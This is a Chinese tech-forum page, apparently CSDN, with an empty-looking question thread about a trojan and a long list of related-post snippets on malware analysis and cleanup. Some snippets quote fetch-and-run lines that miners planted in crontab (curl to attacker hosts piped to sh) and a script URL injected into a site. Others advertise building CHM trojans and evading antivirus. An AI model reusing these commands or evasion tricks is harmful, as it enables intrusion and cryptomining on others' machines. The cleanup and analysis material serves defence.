木马? 病毒??????? [问题点数:100分,结帖人Theleme]

Bbs1
本版专家分:0
结帖率 100%
Bbs8
本版专家分:43548
Blank
微软MVP 2005年7月 荣获微软MVP称号
2008年7月 荣获微软MVP称号
2007年7月 荣获微软MVP称号
2006年7月 荣获微软MVP称号
Blank
红花 2005年5月 Windows专区大版内专家分月排行榜第一
2005年4月 Windows专区大版内专家分月排行榜第一
2005年3月 Windows专区大版内专家分月排行榜第一
Blank
黄花 2005年6月 Windows专区大版内专家分月排行榜第二
Bbs7
本版专家分:13778
Bbs2
本版专家分:307
Bbs7
本版专家分:21737
Blank
蓝花 2003年7月 Windows专区大版内专家分月排行榜第三
Bbs1
本版专家分:0
Bbs1
本版专家分:0
Bbs7
本版专家分:19278
Blank
蓝花 2004年11月 Windows专区大版内专家分月排行榜第三
Bbs7
本版专家分:19278
Blank
蓝花 2004年11月 Windows专区大版内专家分月排行榜第三
Bbs2
本版专家分:438
Blank
黄花 2004年7月 VC/MFC大版内专家分月排行榜第二
其他相关推荐
病毒木马、蠕虫与恶意代码关键点
病毒:寄生存在,所谓寄生,就是病毒的指令存在于其它可执行程序的空指令部分。如下图为一个标准的计寄生形式的病毒: 运行可执行程序,一个jmp指令会导致程序跳转到病毒所在指令处开始执行,执行完毕之后跳转回正常代码区开始执行可执行程序。木马:独立存在,一般具有潜伏期(一般是.exe、.com、.pif、.scr等为后缀的文件) 蠕虫:强制传染性,常利用主机的漏洞在网络中传播。如下为一个蠕虫的基本结
揭穿病毒木马的隐藏手段
病毒木马的隐藏手段   一. 无处可寻的病毒   曾经有一个朋友在一家公司担任计算机维护员的工作,有天主任把他找去维修一台出现异常的计算机,这台计算机上什么程序都未运行,可是机内安装的卡巴斯基杀毒软件却在不停的提示在系统目录发现特洛伊木马程序,而后自动进行查杀,可是刚查杀完毕就又跳出了同样的提示,一旦断开网络连接,这个现象立刻终止,再连接网络,立即再次提示发现特洛伊木马程序……如此反复循
一个感染型木马病毒分析(一)
一、 样本信息 样本名称:resvr.exe(病毒母体) 样本大小:70144 字节 病毒名称:Trojan.Win32.Crypmodadv.a 样本MD5:5E63F3294520B7C07EB4DA38A2BEA301 样本SHA1: B45BCE0FCE6A0C3BA88A1778FA66A576B7D50895 电脑中了该病毒的典型的特
木马病毒DNS数据传输成为历史:看我如何让XShell病毒失效
基础词汇解释: DnsA记录传输: 利用dns解析过程,在请求解析的域名中包含需外传的数据,如xxxxxx.hack.com。则最终hack.com的dns服务器会收到xxxxx这个数据回传。 dns的txt类型回包: 一般指为某个主机名或域名设置的说明,可被黑客利用回传数据。终端请求某恶意域名的dns解析,dns返回txt记录,包含黑客需要的回传内容,如模块更新数据、指令等 概述:
C语言写病毒木马
以前在网吧花了大投资的游戏账号被心痛的盗过一次,于是到了大学就傻逼傻逼的想写病毒木马,出出风头,然后到处到处搜索,相关方法,以为这样就能写出病毒木马。一直持续到前段日子,偶尔看到一本关于杀毒软件是怎么查杀木马的资料,才知晓 自己当时的做法是多么的愚蠢,当时想到的一些方法,很多年
(病毒安全)服务器被中了木马,如何清除
问: 今日发现我服务器上所有站点打开皆有一段莫明其妙的广告弹出,查看原文件让我惊讶了,代码中被植入了一段Js脚本http://iisa1.eyesir.net:7777/gethostjs.php" language="javascript"> , 有时候会变成: var sUrl='http://www.eyesir.net:60000/ads.php?REFERER='+win
记一次Linux服务器上查杀木马经历
转载自:http://www.cnblogs.com/kerrycode/p/4754820.html 开篇前言      Linux服务器一直给我们的印象是安全、稳定、可靠,性能卓越。由于一来Linux本身的安全机制,Linux上的病毒木马较少,二则由于宣称Linux是最安全的操作系统,导致很多人对Linux的安全性有个误解:以为它永远不会感染病毒木马;以为它没有安全漏洞。所以很
Linux清除木马minerd
minerd是什么今天突然发现cup使用率一直都很高,高达100%,查看后发现多了minerd这个进程,将其kill掉后,过一会还是存在 步骤: 1.删除定时任务的内容 crontab -e 将“/10 * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh”删除 2.删除minerd文件[root@iZ28rvl9qn3Z ~]
病毒木马到APT
1983年11月3日,还是南加州大学在读研究生的弗雷德·科恩在UNIX系统下,编写了第一个会自动复制并在计算机间进行传染从而引起系统死机的病毒,因此被誉为“计算机病毒之父”。
暗云Ⅲ: 迄今为止最复杂的木马之一
肆虐多年的暗云木马近日出现多个变种,会感染硬盘主引导记录(MBR),开机启动时间比杀毒软件还要早,因此不但无法查杀,即使格式化硬盘也不能根治。 暗云木马是迄今为止最复杂的木马之一,曾经感染过数百万电脑,它用了很多复杂的新技术来长期潜伏在系统中,尤其是借助BootKit直接感染硬盘引导分区。 攻击者精心制作的这个恶意程序功能复杂,开发技巧很高,采用多种技术方案对抗安全软件,并且更新频繁。
一个简单的Android木马病毒的分析
一、样本信息 文件名称: 一个安卓病毒木马.apk  文件大小:242867 byte   文件类型:application/jar   病毒名称:Android.Trojan.SMSSend.KS 样本MD5:05B009F8E6C30A1BC0A0F793049960BC   二、病毒行为分析 0x1. 静态注册Android
修复被木马病毒隐藏的文件夹

最近文件夹邮递员木马病毒肆行,在优盘上到处传播,虽然最新的杀毒软件能杀灭该病毒,但杀毒软件却不知道去恢复被隐藏的文件夹,导致杀毒后目录全看不到了,更有不少人以为是优盘坏了。
被该木马感染的优盘,会自动生成和文件夹同名的 .exe 文件,再把文件夹添加系统属性进行隐藏,同时还自动隐藏文件名后缀显示,而且图标也是文件夹的样子,很有欺骗性,一旦在未感染木马的电脑上双击了和文件夹同名的 .exe ,木马立即就会感染目标电脑。

其实处理起来很简单的,在未感染木马的电脑上插
病毒木马常用API
常用的Win API函数(在这里给出做木马病毒常用到的API) 1、限制程序功能函数  EnableMenuItem 允许、禁止或变灰指定的菜单条目  EnableWindow 允许或禁止鼠标和键盘控制指定窗口和条目(禁止时菜单变灰)  2、对话框函数  CreateDialog 从资源模板建立一非模态对话窗  CreateDialogParam 从资源模板建立一非模态
阿里云挖矿批处理病毒的解决方案
背景打开了redis的外网端口,redis是由root用户启动,所以入侵者拿到了root权限,在批处理中加入了两个定时任务,每5秒钟去远程代理服务器(美国)获取脚本。分析查看cpu使用率较高的进程 top -c,发现是调用了tmp下的一个文件,tmp下公有多个可疑文件。crontab -l查看,发现有两个定时任务,/5 curl -fsSL http://165.225.157.157:8000/...
HTA病毒分析
这两天看到了一种通过黄色网站,通过社会工程学下载严重加密的HTA文件,传播木马的web病毒 (有需要病毒代码的同学可以和我联系) 之前没看过HTA (HTML Application),看了才知道HTA是HTML格式的应用程序,双击后由mshta进程执行,因为在本地执行,所以在win7上不存在权限问题 例如 =================================
病毒木马查杀实战第018篇:病毒特征码查杀之基本原理
前言       在本系列的导论中,我曾经在“病毒查杀方法”中简单讲解过特征码查杀这种方式。而我也在对于实际病毒的专杀工具编写中,使用过CRC32算法来对目标程序进行指纹匹配,从而进行病毒判定。一般来说,类似于MD5以及CRC32这样的算法,在病毒大规模爆发时是可以提高查杀效率的,但是传统的更为常用的方法是采用以静态分析文件的结构为主并结合动态分析的方法,通过反汇编来寻找病毒的内容代码段、入口点代
linux系统入侵排查以及木马清除
挖矿病毒攻防 一.rootkit病毒介绍 这类挖矿木马是一种很深的隐藏在操作系统中执行恶意或令人讨厌的程序,正如病毒名字所述,这个木马病毒就是用来挖矿的,通过一系列脚本来控制系统的cpu做一些计算,同时将计算结果发往外界。一般的病毒清除方法对这个挖矿程序并不管用,因为这个程序超级顽固,你清除了一个,又会产生新的,春风吹又生。 二.被木马感染后的系统表现 (1)最...
处理服务器挖矿木马
挖矿木马潜伏在服务器上,可能每一个木马名称都不一样,但是大致基本一样。   由于我之前处理时候并没有保留图片,所以此文章依据别的文章所做整理。   杀wnTKYg病毒分两步,第一是找到它的来源,切断入口,第二步,找到它的守护进程并杀死,然后再去杀死病毒进程,有的守护进程很隐蔽,唤醒病毒之后,自动消亡,这时候top就看不到了,要留心。 类似于这样,cpu达到百分之百了,这样的进程杀都杀不掉
病毒木马查杀实战第023篇:MBR病毒之引导区的解析
前言        引导型病毒指寄生在磁盘引导区或主引导区的计算机病毒。这种病毒利用系统引导时,不对主引导区的内容正确与否进行判别的缺点,在引导系统的过程中入侵系统,驻留内存,监视系统运行,伺机传染和破坏。按照引导型病毒在硬盘上的寄生位置又可细分为主引导记录病毒和分区引导记录病毒。我们未来的几次课,会专门从各个角度来分析这种病毒的特点,阐述病毒原理,提出应对方法。而本次课程的内容主要来讨论一下引
今天遭受驱动级的木马病毒袭击。
今天可能下载了病毒软件。重新启动后,symantec报警,发现hkmmo.dll病毒,为downloader类。 于是,我转向c:/windows/system32目录下删除,结果文件使用中,无法删除,于是查看启动项和服务启动项,并没发现有此项目。然后就使用XP启动盘,使用命令行删除,重新启动后,发现rundll找不到hkmmo.dll,然而查找了整个注册表,却找不到有关的记录,猜测跟驱动有关系。
病毒木马查杀实战第025篇:JS下载者脚本木马的分析与防御
前言       这次我与大家分享的是我所总结的关于JS下载者脚本木马的分析与防御技术。之所以要选择这样的一个题目,是因为在日常的病毒分析工作中,每天都会遇到这类病毒样本,少则几个,多则几十个(当然了,更多的样本已经被自动分析系统拦截下来了)。而且这类的样本甚至还有愈演愈烈之势,很可能会长盛不衰。JS脚本木马之所以会如此泛滥,与它的编写简单、易于免杀以及难以封堵等特点息息相关。而我们本次的课程也会
关于木马Autoit
这个木马不能用毒霸杀掉。让我对毒霸很失望,以前一直觉得360垃圾软件,但是人家就能查出来这个。 AutoIt是一个自动化的Windows界面交互的脚本语言,具有很高的灵活性和较低的学习曲线。由于AutoIt解释器本身属于合法程序,黑客可以把恶意代码藏在脚本文件中,从而灵活地创建恶意软件,在系统中没有独立进程存在,从而延长其存活周期。 以下是一个从国外流传进来的AutoIt木马样本,
一个DDOS木马后门病毒的分析
一、样本信息 文件名称:803c617e665ff7e0318386e24df63038 文件大小:61KB 病毒名称:DDoS/Nitol.A.1562 MD5:803c617e665ff7e0318386e24df63038 Sha-1:e05277aafd161470b020e9e8d2aa2dcb9759328c   二、样本行为 0x1.打开与当前病毒进程
木马病毒工作原理
      木马病毒,是病毒的特殊形式,它与一般病毒的区别是它不仅停留在本机电脑里,更利用一些手段开放电脑端口获得与木马服务器的通信,达到获取用户信息的目的。      一个木马程序通常很小,它典型的工作方式是通过一些手段下载到用户电脑里,然后获得启动。启动后的木马进入活动状态。活动状态的木马就可以进行破坏性的操作了。      下载方式:(1) 网页挂马;(2)文件捆绑;
一个可恶的javascript病毒/木马解码之后的代码
中毒的话,整个网络都会受影响,表现为所有的IE浏览器打开的网页都会在前面加一个 javascript 的连接。清除比较麻烦。显示的这段是这个链接后面的代码:var vDA1 = new window["Date"]() vDA1["setTime"](vDA1["getTime"]() + 24*60*60*1000)var eOTo$2 = new window["String"](wi
安卓开发360扫描出现病毒“盗号木马
安装开发项目,之前的版本没有问题。 debug调试的时候,也没有发现问题。 签名打包的时候, 360扫描apk出现病毒“盗号木马” 提示:使用与软件本身属性不符的风险权限 如下图所示: 发生的原因: 经过各种情况的测验,有如下发现: 1. 签名:用原始keystore签名,360报木马。怀疑是原始keystore感染木马,于是创建了一
自己动手显示U盘中被病毒隐藏起来的文件
 对于U盘病毒相信大家都会有中毒的经历吧,虽然其造成的危害不像硬盘中病毒那么大,但很影响日常的使用。对于经常要去打印室打印材料的朋友们来说,中毒是很平常的事情。U盘病毒最主要的危害就是将U盘中的文件或者文件夹隐藏起来,即使使用杀毒软件清除U盘中的病毒,但是被隐藏起来的文件仍然显示不出来。     被病毒隐藏起来的文件,我们使用“工具”→“文件夹选项”→“查看”选项卡→“显示所有文件和文件夹”是不能
关于Recycle.exe病毒的分析


【名称】:recycle.exe病毒
【传播方式】:U盘
【属性】:木马
【测试环境】:windows xp sp3 、冰刃、Process MonitorV2.02H、File Monlter、combo防火墙免费版(功能全开,未更新)
【表现形式】:感染U盘,把U盘里根目录的文件夹隐藏为系统属性,并建立相同的文件名.exe文件,和recycle.exe系统隐藏文件,大小固定1.16mb,可显示的exe病毒表现为我的文档形式图标,在系统文
查看完整版本 : 病毒木马 【分享】一个病毒源码的分析
.586.model flat, stdcalloption casemap : none ; 区分大小写include /masm32/include/windows.incinclude /masm32/include/user32.incinclude /masm32/include/kernel32.incinclude /masm32/include/gdi32.incincludeli
Redis漏洞挖矿木马清除
systemd-logind cputest Redis漏洞 minerd
global.asa 木马解析及解决办法
网站被黑客盯上了,输入网址的时候正常显示网站;但是在搜索引擎里面搜网站打开后竟然是黄色网站信息!让人深恶痛绝啊!开始我以为是首页或者调用的某个页面被挂马了,查看网页上传日期和网页代码;没有发现被修改的痕迹;之后又怀疑服务器问题;因为网站在根目录无故出现了个global.asa文件开始只能看到一句话 下面全是空白,就怀疑是服务器问题; 服务器杀毒,重装;还是出现问题!黄色信息还是不断生成,删除了g
删除Skypee顽固病毒(AutoIt3木马
一、Skypee顽固病毒(AutoIt3木马)介绍 原理: 1.检查自身运行环境 2.创建开机自启动 3.感染全部磁盘 4.驻留内存并与服务器通信实现远程控制 症状: 1.无故创建快捷方式,一般在一级文件夹目录下包含有该文件夹名字的快捷方式。 2.U盘还有一些my games、my pictuers、my videos、hot、downloads、movies之类的
photo.scr FTP矿机木马的分析和清理
ftp服务器出现photo.scr文件,删除后很快再次出现,找了很多方法没有解决,最后找到下面的方法,来自: chermy:http://chermy.lofter.com/post/1cdb7b70_e894684 第一次发现这个木马的时候是在上班, 突然发现公司的服务器上有这个可疑的文件, 它是这样的图标(右边是正常的文件夹): 赶紧用任务管理器打开一看, 晚
一个感染性木马病毒分析(三)--文件的修复
一、 序言 前面的分析一个感染型木马病毒分析(二)中,已经将该感染性木马病毒resvr.exe木马性的一面分析了一下,下面就将该感染性木马病毒resvr.exe感染性的一面分析一下。   二、文件感染方式的分析 之前感染性木马病毒的分析中,已经提到了病毒对于用户文件的感染方式有2种,分别是加密文件和感染文件传播病毒,至于文件感染的时候采取哪种感染方式,病毒母体文件和
Symantec发生严重误报状况windows netapi32.dll和lassrv.dll被误报为病毒
请大家注意,5.18号病毒库,重启过后系统就崩溃了。千万小心,大家要注意我们公司几十台机器挂了!!!!!!!!!! 
Keygen.exe——一个比较难对付的DLL木马
作者:baohe样本来源:http://keygen.name/download/delta.force.xtreme_keygen.exe特点:1、Keygen.exe运行后,在system32文件夹中释放一个随机文件名的DLL(本次感染释放的是:rqrsppn.dll)。随后,将Keygen.exe自身删除。2、该DLL插入winlogon进程。若用IceSword强制卸除该DLL————
灰鸽子病毒手工清除方法[多图]
灰鸽子(Backdoor.Huigezi)作者现在还没有停止对灰鸽子的开发,再加上有些人为了避开杀毒软件的查杀故意给灰鸽子加上各种不同的壳,造成现在网络上不断有新的灰鸽子变种出现。尽管瑞星公司一直在不遗余力地收集最新的灰鸽子样本,但由于变种繁多,还会有一些“漏网之鱼”。如果您的机器出现灰鸽子症状但用瑞星杀毒软件查不到,那很可能是中了还没有被截获的新变种。这个时候,就需要手工杀掉灰鸽子。    手
windows主机手动木马查杀
因为手动查杀木马病毒的帖子网上一抓就是一大把,往往都是些很久很老的帖子,win2k、win9x下的那些方法,要不就是xp、win7里面找不到的方法,这里是针对个人PC,经过本人测试xp和win7可以按照的方法,下面的方法是总结的,不是某一个或某几个的方法,过时的方法已经去掉了,留下了可能能用到的方法,即使是这样手动查杀也是显得费时费力,除非精通windos内核,或者天才的把windows里所有系
易语言木马病毒源码qq木马
易语言木马病毒源码,共同学进宫参考,上边有源码和已经编译的exe文件
一次虚拟机感染挖矿木马事件处置
最近在做日常安全运维时发现某虚拟机CPU利用率异常的高,登录虚拟机发现,某进程占用了异常高的cpu使用率:   通过右键“打开文件所在的位置”:   打开2.bat文件,内容如下:   百度文件内容,发现为知名挖矿木马: 综合虚拟机cpu利用率异常高的现象即可判断该主机已被恶意利用为挖矿的肉机,其将互联网上“挖”到的门罗币汇入如下地址: 4AyP2DqMQVbgHrV2YeX9
网站被挂木马病毒了,怎么办?
A。为什么好好的网站会有木马?一般木马是来自ASP SHELL和PHP SHELL的程序段控制不严,程序上有上传功能,没有进行文件目录和文件后缀等的判断,一般这类的目录,以“海阳顶端网ASP木马”较为流行。因2003平台IIS6原因,也存在目录名问题引起ASP木马。(微软的IIS 6存在严重解析文件名错误测试办法:在FTP中建立一个 test.asp 的文件夹,文件夹名就是 test.asp
调戏木马病毒的正确姿势-基础篇
目录 ----------------------理论基础篇-------------------    从科幻小说说起:         危险的潘多拉盒子         来说说应用程序编程接口         工欲善其事必先利其器         (*)正确地作死         (*)被劫持的应用程序接口         (***)Hook与QQ密码的战争        
关于网站发现挖矿病毒的通知
这两天有部分客户的opencart系统电商网站陆续出现错误提示,发现是挖矿CoinHive病毒程序所致。 侵入者一般修改了网站前台的Index.php和config.php文件, 同时还会上传一个ftp.php文件 修复方法: 恢复Index.php, config.php,删除其他新上传的文件。 目前初步判断是用户获得了服务器的诸如ftp信息,然后修改上传相关文件。
细说Wannacry勒索软件所使用的木马技术
已经发表于freebuf: (   http://www.freebuf.com/column/134855.html) 5月12日晚突然爆发的Wannacry勒索病毒给人们也给各大安全厂商一个措手不及,360追日团队也第一时间给出了完整的木马分析,结合我自己的逆向以及分析我们来细说Wanncry使用了哪些木马技术。  1. 资源释放文件 这个技术最早始于root
zbot木马分析
木马属于zbot木马家族,并且此木马的免杀做的非常好。能过很好的逃过杀软的检测,而此木马对自己进行了很好的保护,经过了三个阶段才将自己释放出来。并添加了开机自启动。木马主要的四个阶段: 0x01:释放样本到临时文件夹,并启动0x02:释放文件到C:\Documents and Settings\Administrator\Application Data\目录,并且生成文件,设置开机自启动,然后启
六、关于阿里云CentOS7被挖矿木马程序入侵的解决办法
查看进程:top c
祭----------------一次查杀linux木马的经历
症状表现: 公司内部网络有一天突然开始卡顿,有几个应用特别慢。网络人员查网络,发现有一台机子在大量的发送数据,大概每秒百兆这样子。 -------------------------------------------华丽丽的分割线----------------------------------------------------- 查找原因: 安装iftop: 由于那台机子没有装i
vbs 转成exe(不会警告为病毒,木马)
vbs 转成exe,vbs 转成exe,vbs 转成exe,vbs 转成exe,vbs 转成exe,多多支持,希望能帮到有需要的人!
动态嵌入式DLL木马病毒的发现及清除
随着MS的操作系统从Win98过渡到Winnt系统(包括2k/xp),MS的任务管理器也一下子脱胎换骨,变得火眼金睛起来(在WINNT下传统木马再也无法隐藏自己的进程),这使得以前在win98下靠将进程注册为系统服务就能够从任务管理器中隐形的木马面临前所未有的危机,所以木马的开发者及时调整了开发思路,所以才会有今天这篇讨论如何清除动态嵌入式DLL木马的文章。   首先,我们来了解一下什么是动态
CHM木马(简单高效)
这是现在网上比较普遍的一种中马方法,主要就是利用CHM可以将可执行文件包含其中,并且利用简单的html就可以让程序自动运行,制作方法非常简单,主要就是木马的选择,由于不知道对方机器上是否用了杀毒软件,也不知道是什么杀毒软件,所以要用绝对不被查杀的木马或是后门程序(自己加壳的方法也不错‘最好是一些不太知名的加壳软件),另外还有用到CHM制作工具,推荐QuickCHM。将木马和html文件放在同一文件
手机里有个安卓apk 木马病毒 ,自动发短信到18389675619
手机安装miui6 ,里面有个安卓apk 木马病毒 ,自动发短信到18389675619。。。。
病毒伪装成explorer.exe进程
---------------------------------------------------------       小路原创           ------------------------------------------------昨天晚上为了做计算机安全与保密课的实验,我把电脑的杀毒软件都关闭了之后安装运行了几个软件,结果几天早上一开机发现电脑桌面和下面的状态栏都没有了,怎
火眼病毒木马分析
1,木马分析最近服务器中招了,破windows。 找到了一个木马分析云端软件 可以分析不知道是不是木马病毒。 金山出品的,挺有意思的。估计是在服务器上面开了一个虚拟机,然后对虚拟机进行监控,再分析下。 分析windows 执行文件的报告,很详细直观。2,可以分析apk文件这个比较有意思,可以分析下apk文件是否安全。 apk软件运行效果: 这个比较好了,现在手机apk软件这么多,
介绍下加壳、脱壳以及如何病毒免杀技术与原理
介绍下加壳、脱壳以及如何病毒免杀技术与原理 在自然界中,我想大家对壳这东西应该都不会陌生了,由上述故事,我们也可见一斑。自然界中植物用它来保护种子,动物用它来保护身体等等。同样,在一些计算机软件里也有一段专门负责保护软件不被非法修改或反编译的程序。它们一般都是先于程序运行,拿到控制权,然后完成它们保护软件的任务。就像动植物的壳一般都是在身体外面一样理所当然(但后来也出现了所谓的“壳中带籽”的
手动查杀skypee病毒(AutoIt3木马)
前几天用U盘插了别人的电脑,致使自己的电脑中了skypee病毒(暂且叫这个名字吧)。目前我发现的该病毒的针状有,无故创建快捷方式,一般在一级文件夹目录下包含有该文件夹名字的快捷方式,U盘还有一些my games、my pictuers、my videos、hot、downloads、movies之类的类此Windows库文件夹的快捷方式。删除之后又会建立该快捷方式。所有的这些快捷方式都被伪装为了文
病毒、蠕虫与木马之间的区别
随着互联网的日益流行,各种病毒木马也猖厥起来,几乎每天都有新的病毒产生,大肆传播破坏,给广大互联网用户造成了极大的危害,几乎到了令人谈毒色变的地步。各种病毒,蠕虫,木马纷至沓来,令人防不胜防,苦恼无比。那么,究竟什么是病毒,蠕虫,木马,它们之间又有什么区别?相信大多数人对这个问题并没有一个清晰的了解,在这里,我们就来简单讲讲。     病毒、蠕虫和特洛伊木马是可导致您的计算机和计算机上的信息损坏的
病毒木马测试包 里面有6000多个病毒
病毒木马测试包 里面病毒木马测试包 里面有6000多个病毒有6000多个病毒
病毒木马介绍
蠕虫病毒:蠕虫病毒是一种常见的计算机病毒。它是利用网络进行复制和传播,传染途径是通过网络和电子邮件。最初的蠕虫病毒定义是因为在DOS环境下,病毒发作时会在屏幕上出现一条类似虫子的东西,胡乱吞吃屏幕上的字母并将其改形。蠕虫病毒是自包含的程序(或是一套程序),它能传播自身功能的拷贝或自身的某些部分到其他的计算机系统中(通常是经过网络连接)。 与一般病毒不同,蠕虫不需要将其自身附着到宿主程序,有两种类
lsass.exe病毒木马手工清除方法
病毒症状进程里面有2个lsass.exe进程,一个是system的,一个是当前用户名的(该进程为病毒).双击本地磁盘D:打不开,只能通过右击选择打开来打开.用瑞星扫描可以扫描出来,并且可以杀掉.但是重启后又有两个lsass.exe进程.该病毒是一个木马程序,中毒后会在D盘根目录下产生command.com和autorun.inf两个文件,同时侵入注册表破坏系统文件关联.该病毒修改注册表启动RUN键
反病毒攻防研究第001篇:利用注册表实现自启动
一、前言         我在上一篇文章中说到,一般来讲,用户只要不去双击病毒木马,那么它就不会运行。说到运行,其实实现病毒木马自运行的方式有很多,但是前提都是需要有人对其进行双击操作,从而启动病毒木马的自运行功能。         而这次我主要讨论的是利用注册表实现“病毒”(对话框)的自启动,准确来说是,当有用户第一次双击运行了“病毒”(对话框)程序后,它会在每次开机时实现自启动。这一方法多
【Android病毒分析报告】--CoinMiner “掘金僵尸”手机变“挖矿机”
近日百度安全实验室查杀了一批“掘金僵尸”手机木马,该木马通过控制大量手机构建“掘金僵尸网络”,感染该木马的手机即成该“掘金僵尸网络”的肉鸡。黑客通过僵尸网络,远程控制用户手机持续在后台挖掘数字货币(包括莱特币“Litecoin”、狗币“Dogecoin”、以及卡斯币“Casinocoin”等),挖掘货币过程会持续占用CPU、GPU资源,造成手机电量过快耗尽,使得被感染的“肉鸡”成为了帮黑客赚钱的工
关于服务被挖矿程序minerd入侵解决方法
今天一早过来,运维同事发现服务器的负载有点异常,打开top一看,发现有个进程一直占用很高的cpu 在opt目录下发现有个异常文件,是个命令文件minerd 在确定跟项目不相关的情况下判断是个木马程序,果断kill掉进程,然后删除/opt下minerd文件 本想这样可以解决,谁想不到15秒时间,又自动启动起来,而且文件又自动创建,这个让我想起了crontab的定时器,果然运维同
病毒木马查杀实战第010篇:QQ盗号木马之十六进制代码分析
一、前言 按照我的个人习惯,在运用诸如IDA Pro与OllyDBG对病毒进行逆向分析之前,我都会利用一些自动化的工具,通过静态或动态的分析方法(参见《病毒木马查杀第008篇:熊猫烧香之病毒查杀总结》)来对病毒的行为产生一定的认识,这样在之后的逆向分析中,我就能够产生“先入为主”的心态,在分析反汇编代码的时候就能够比较顺利。本文论述的是通过静态分析方法来理解我们的目标病毒,看看仅仅通过观察其十六
鬼影病毒学习总结
鬼影病毒 鬼影病毒是指寄生在磁盘主引导记录(MBR),即使格式化重装系统,也无法清除的病毒。 2010年3月15日,国内某安全中心发现一种被命名为“鬼影”的电脑病毒,由于该病毒成功运行后,在进程中、系统启动加载项里找不到任何异常,同时即使格式化重装系统,也无法彻底清除该病毒。犹如“鬼影”一般“阴魂不散”,所以称为“鬼影病毒“。该病毒也因此成为国内首个“引导区下载者病毒”。 1 来源介
java 木马开发(1)
曾经研究过一段时间的逆向、破解、木马病毒之类的,很多人说,Java不能写木马,当时气不过,就写了一个简单的木马。最近一段时间有些闲,整理一些以前的代码,也是一个学习的过程。 现在将木马运行的效果贴一下,在以后的过程中,回分几部分将代码讲解清楚贴出来,希望大家多提宝贵意见。 服务端每隔5秒钟运行一次监听 =================================
不定期更新最新流行病毒木马样本打包高速下载
http://www.gangsir.cn/article/1.htm#page=6
图解冰河木马一次使用过程
首先搜索 冰河木马 ,然后下载;一下载好,360即报木马; 因为目前是我们准备尝试一下干坏事,恢复之;信任之; 解压之后又报病毒; 恢复; 看下,一个客户端;一个服务端; 先走客户端;360发现 Trojan.Generic; 信任之;防火墙阻止,允许在专用网络上运行; 一跑起来报了个访问违例;启动画面还不错;
教你怎样清除DLL病毒
教你怎样清除DLL病毒2007-04-02 17:48 从DLL技术说起   要了解DLL木马,就必须知道这个“DLL”是什么意思,所以,让我们追溯到几年前,DOS系统大行其道的日子里。在那时候,写程序是一件繁琐的事情,因为每个程序的代码都是独立的,
实验一木马分析(隐藏分析)实验
实验一木马分析(隐藏分析)实验
Linux服务器中木马(肉鸡)手工清除方法(转载)
由于自己也碰到过这种情况,刚好看到这篇文章,先转载过来。的确蛮有用的哦。 首先剧透一下后门木马如下: (当然这是事后平静下来后慢慢搜出来的,那个时候喝着咖啡感觉像个自由人) 木马名称 Linux.BackDoor.Gates.5 http://forum.antichat.ru/threads/413337/  首先是下午14点左右有几台服务器出现流量超高,平时
记录一次阿里云redis被黑客植入挖矿木马
1.top查询占用CPU进程2. find / -name 进程3.rm -rf 文件4.ps -ef | grep -v grep | egrep '进程' | awk '{print $2}' | xargs kill -95.crontab -l查看定时任务6.echo > /var/spool/cron/root清除定时任务7.清除/root/.ssh/目录下的对应密匙8.重启red...
Python编写简易木马程序
Python编写简易木马程序 0x00 准备 文章内容仅供学习研究、切勿用于非法用途! 这次我们使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马。依然选用Sublime text2 +JEDI(python自动补全插件)来撸代码,安装配置JEDI插件可以参照这里: http://drops.wooyun.org/tips/4413
Atitit.木马病毒自动启动-------------win7计划任务的管理
Atitit.木马病毒自动启动-------------win7计划任务的管理   1. 计划任务的Windows系统中取代AT 的schtasks命令1 2. Win本身的系统计划任务列表1 2.1. 计划任务列表管理gui版本  %windir%\system32\taskschd.msc /s1 2.2. 计划任务列表管理cli版本1 3. 360的列表接口ui2 4. tas
【网络安全】我的第一次windows服务器杀毒经历
公司的数据库服务器上有毒,一直没太在意(因为没有人在意,创业公司,问题不严重就没人管)。 今天遇到点问题,就顺手把服务器上的毒清了吧。 快捷键win+ R,打开cmd 输入netstat -ano查看端口状态 etablished表示正在使用的,其他的不管,UDP协议的也不管 打开百度,搜索IP,查看ip归属地 发现176.9.147.178是国外的ip,这个就是攻击者的ip了
灰鸽子木马的原理和清除方法
 灰鸽子客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服务端程序。可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。连接密码的设定使得灰鸽子服务端程序只能被配置它的黑客控制,避免了黑客之间的竞争。服务端对客户端连接方式有多种,使得处于各种网络环境的用户都
一次被入侵和删除木马程序的经历(转)
首先剧透一下后门木马如下: (当然这是事后平静下来后慢慢搜出来的,那个时候喝着咖啡感觉像个自由人) 木马名称 Linux.BackDoor.Gates.5 http://forum.antichat.ru/threads/413337/ 首先是下午14点左右有几台服务器出现流量超高,平时只有几百M的流量,那时候发现流量上G了,达到这个量第一感觉就是遭受了DDOS流量攻击
QQ木马到底怎么做?QQ挂马方法大揭密(图)
  有无数上网用户每天都在使用QQ,大家往往注重于QQ尾巴病毒、QQ传木马之类的攻击方式,却很少有人注意到我们经常访问的QQ群、QQ空间里面隐藏着更大的安全危险,远比QQ尾巴病毒、QQ传木马之类的隐蔽得多,危害更加大。今天我们就来看看攻击者是如何在QQ群和QQ空间中挂上网页木马,攻击浏览用户的!   一、QQ群中简简单单挂木马   在一个比较火的QQ群里挂上网页木马,一定很容易得到许多肉鸡的。怎么
Svchost.exe是病毒的两种情况
1.利用假冒Svchost.exe名称的病毒程序 这种方式运行的病毒并没有直接利用真正的Svchost.exe进程,而是启动了另外一个名称同样是Svchost.exe的病毒进程,由于这个假冒的病毒进程并没有加载系统服务,它和真正的Svchost.exe进程是不同的,只需在命令行窗口中运行一下“Tasklist /svc”,如果看到哪个Svchost.exe进程后面提示的服务信息是“暂缺”,而不
记一次服务器被挖矿木马攻击的经历
背景 利用空余时间买了台服务器做了个小网站玩,今天访问了一下,加载巨慢,一看服务器运行情况,CPU飙到100%,按CPU消耗排序,排在第一的是一个名为“imWBR1”的进程,查了一下是一个挖矿木马,于是赶紧采取办法~ 清除恶意程序 首先比较直观的是imWBR1这个进程,查找它的位置在/tmp/目录下,如下图: (图2) 先删除/tmp/imWBR1,再kill掉imW
用Python简单制作远程视频监控木马,简单的编程思路我就不吹了!
